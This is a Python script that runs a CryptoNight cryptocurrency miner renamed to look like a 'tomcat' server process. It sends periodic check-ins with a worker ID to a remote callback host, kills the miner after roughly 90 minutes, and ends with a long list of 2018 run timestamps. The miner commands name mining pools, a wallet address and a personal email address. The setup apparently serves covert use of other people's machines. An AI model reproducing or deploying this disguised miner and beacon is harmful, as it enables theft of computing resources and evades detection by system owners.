import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:46:06.746739
#2018-02-17 16:33:05.262943
#2018-02-17 18:21:04.236545
#2018-02-17 20:09:06.073590
#2018-02-17 21:56:05.808059
#2018-02-17 23:41:08.027260
#2018-02-18 01:29:03.577198
#2018-02-18 03:16:03.391781
#2018-02-18 05:05:06.238471
#2018-02-18 06:56:05.331539
#2018-02-18 08:44:07.229215
#2018-02-18 10:31:04.776298
#2018-02-18 12:15:09.338723
#2018-02-18 14:02:07.056125
#2018-02-18 15:52:05.309496
#2018-02-18 17:41:06.857976
#2018-02-18 19:28:05.160982
#2018-02-18 21:13:05.776139
#2018-02-18 23:01:04.891405
#2018-02-19 00:47:06.779512
#2018-02-19 02:34:07.848612
#2018-02-19 04:20:02.071024
#2018-02-19 06:04:07.362570
#2018-02-19 07:54:01.511382
#2018-02-19 09:44:07.358107
#2018-02-19 11:35:03.586518
#2018-02-19 13:22:04.714238
#2018-02-19 15:09:09.291405
#2018-02-19 16:56:04.846272
#2018-02-19 18:42:10.002849
#2018-02-19 20:29:02.008003
#2018-02-19 22:16:07.788572
#2018-02-20 00:01:05.230026
#2018-02-20 01:48:04.619468
#2018-02-20 03:37:04.626220
#2018-02-20 05:24:06.432240
#2018-02-20 07:07:07.566419
#2018-02-20 08:52:07.001826
#2018-02-20 10:37:06.366442
#2018-02-20 12:23:06.020518
#2018-02-20 14:09:06.076344
#2018-02-20 15:52:01.827508
#2018-02-20 17:37:09.314245
#2018-02-20 19:27:02.231897
#2018-02-20 21:16:04.018963
#2018-02-20 23:00:06.905021
#2018-02-21 00:44:04.849460
#2018-02-21 02:52:02.000401
#2018-02-21 04:39:06.185057
#2018-02-21 06:27:04.111102
#2018-02-21 08:12:07.148385
#2018-02-21 09:58:08.711298
#2018-02-21 11:46:10.470419
#2018-02-21 13:37:06.563828
#2018-02-21 15:20:12.921223
#2018-02-21 17:11:05.091778
#2018-02-21 18:58:06.201711
#2018-02-21 20:47:07.566633
#2018-02-21 22:32:06.195819
#2018-02-22 00:22:05.115465
#2018-02-22 02:10:01.718109
#2018-02-22 03:55:06.994009
#2018-02-22 05:41:07.978485
#2018-02-22 07:27:07.221909
#2018-02-22 09:15:06.388429
#2018-02-22 11:02:06.793537
#2018-02-22 12:49:11.127487
#2018-02-22 14:34:09.708871
#2018-02-22 16:20:02.889247
#2018-02-22 18:07:04.379895
#2018-02-22 19:55:08.994144
#2018-02-22 21:44:08.264798
#2018-02-22 23:32:06.096990
#2018-02-23 01:20:05.542912
#2018-02-23 03:06:07.586522
#2018-02-23 04:54:04.792447
#2018-02-23 06:38:03.788736
#2018-02-23 08:28:06.685656
#2018-02-23 10:42:07.949479
#2018-02-23 12:39:06.760989
#2018-02-23 14:24:02.178338
#2018-02-23 16:15:08.948195
#2018-02-23 17:59:09.681680
#2018-02-23 19:45:04.378996
#2018-02-23 21:27:07.980828
#2018-02-23 23:14:07.627487
#2018-02-24 01:06:06.803287
#2018-02-24 02:58:03.844611
#2018-02-24 04:46:04.854952
#2018-02-24 06:33:06.404633
#2018-02-24 08:22:01.540804
#2018-02-24 10:06:07.143056
#2018-02-24 12:04:06.121946
#2018-02-24 13:52:05.278684
#2018-02-24 15:40:06.596574
#2018-02-24 17:34:01.425399
#2018-02-24 19:20:09.839928
#2018-02-24 21:11:07.509245
#2018-02-24 23:44:05.938423
#2018-02-25 03:05:07.923184
#2018-02-25 06:44:08.223752